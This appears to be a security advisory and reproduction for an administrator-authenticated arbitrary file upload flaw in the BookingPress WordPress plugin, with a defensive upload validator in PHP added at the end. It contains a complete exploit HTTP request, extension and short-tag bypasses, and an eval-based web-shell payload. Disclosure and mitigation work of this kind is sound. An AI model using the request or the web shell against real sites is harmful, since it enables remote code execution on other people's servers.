The BookingPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient filename validation in the 'bookingpress_upload_service_func', 'bookingpress_upload_customer_avatar_func' and 'bookingpress_upload_company_avatar_func' functions and lax filtering of 'bookingpress_read_file'. This allows an authenticated attacker with administrator-level capabilities or higher to upload arbitrary files on the affected site's server, enabling remote code execution.

Vulnerability reproduction

Here we take the bookingpress_upload_customer_avatar_func function as an example.


Add New


Capture and modify the request with Burp Suite

Capture the upload request with Burp Suite and modify it. Give the file a suffix of [php] or (php) to bypass sanitize_file_name, change Content-Type to an image type, and use the short open tag <? ?> to bypass bookingpress_read_file.


POST /wp-admin/admin-ajax.php?action=bookingpress_upload_customer_avatar&_wpnonce=0e7ca9aca0 HTTP/1.1
Host: localhost:9099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:9099/wp-admin/admin.php?page=bookingpress_customers
Content-Type: multipart/form-data; boundary=---------------------------2986859182981567855468506664
Content-Length: 244
Origin: http://localhost:9099
Sec-GPC: 1
Connection: close
Cookie: wordpress_13b523f0f890b6aba72e693c42f8abc1=toor%7C1709096139%7ChGe5VBfmo6m3PVET53X88JlY6J2iGqODeDdcqR8Ceuh%7C3d9b538c215b71fb51a874ab2c7d0cb8e72bb126fe88815d126625b5cab62f5f; PHPSESSID=826f66883ffde0d1b9314097980ccc3f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_13b523f0f890b6aba72e693c42f8abc1=toor%7C1709096139%7ChGe5VBfmo6m3PVET53X88JlY6J2iGqODeDdcqR8Ceuh%7Cf4a737b540423fdd46c85883f8bcb6fea56ec782ac1752685b25cb53afd7503e; wp-settings-1=mfold%3Do%26libraryContent%3Dupload%26editor%3Dhtml; wp-settings-time-1=1708923340

-----------------------------2986859182981567855468506664
Content-Disposition: form-data; name="file"; filename="customer_avatar.[php]"
Content-Type: image/jpeg

<? phpinfo();?>
-----------------------------2986859182981567855468506664--

The content of the uploaded file can also be <?pHP phpinfo();, which PHP also parses.


Of course, malicious content such as <? eval($_POST[1]);?> can also be uploaded to achieve RCE.
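As an added example, not code from the BookingPress plugin, here is a strict avatar upload check in plain PHP that closes both bypasses shown above: the extension is allowlisted rather than denylisted, the request's Content-Type is ignored in favour of sniffing the bytes on disk, and any PHP open tag (including <? and mixed case) is rejected. The function name, the allowlists and the assumption that the handler receives the client filename and the temporary upload path are mine.

```php
<?php
// Added example, not BookingPress code: a strict validator for an avatar
// upload. $clientName is the filename from the multipart request and
// $tmpPath the temporary file on disk; both are attacker-controlled.
// Returns a server-generated safe filename, or null to reject the upload.

const AVATAR_ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];
const AVATAR_ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

function safe_avatar_name(string $clientName, string $tmpPath): ?string
{
    // 1. Allowlist the extension of the client name. "avatar.[php]" and
    //    "avatar.(php)" do not even match the pattern (the bracket is not
    //    alphanumeric), and "avatar.php" has an extension that is not on
    //    the list, so a "not php" denylist is never relied upon.
    if (!preg_match('/\.([A-Za-z0-9]+)$/', $clientName, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    if (!in_array($ext, AVATAR_ALLOWED_EXT, true)) {
        return null;
    }

    // 2. Ignore the request's Content-Type header (set to image/jpeg in the
    //    captured request); sniff the bytes actually written to disk.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, AVATAR_ALLOWED_MIME, true)) {
        return null;
    }

    // 3. The file must also decode as an image.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }

    // 4. Reject any PHP open tag. stripos() catches "<?php", the short
    //    form "<?" and mixed case such as "<?pHP" in a single check.
    if (stripos(file_get_contents($tmpPath), '<?') !== false) {
        return null;
    }

    // 5. Never store under the client's name: generate one server-side
    //    and attach only the allowlisted extension.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}
```

Step 4 can reject a legitimate image whose binary data happens to contain the bytes "<?"; re-encoding the image with GD (imagecreatefromstring followed by imagejpeg/imagepng) before storing it is the stricter alternative that also strips embedded payloads.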

Vulnerability cause analysis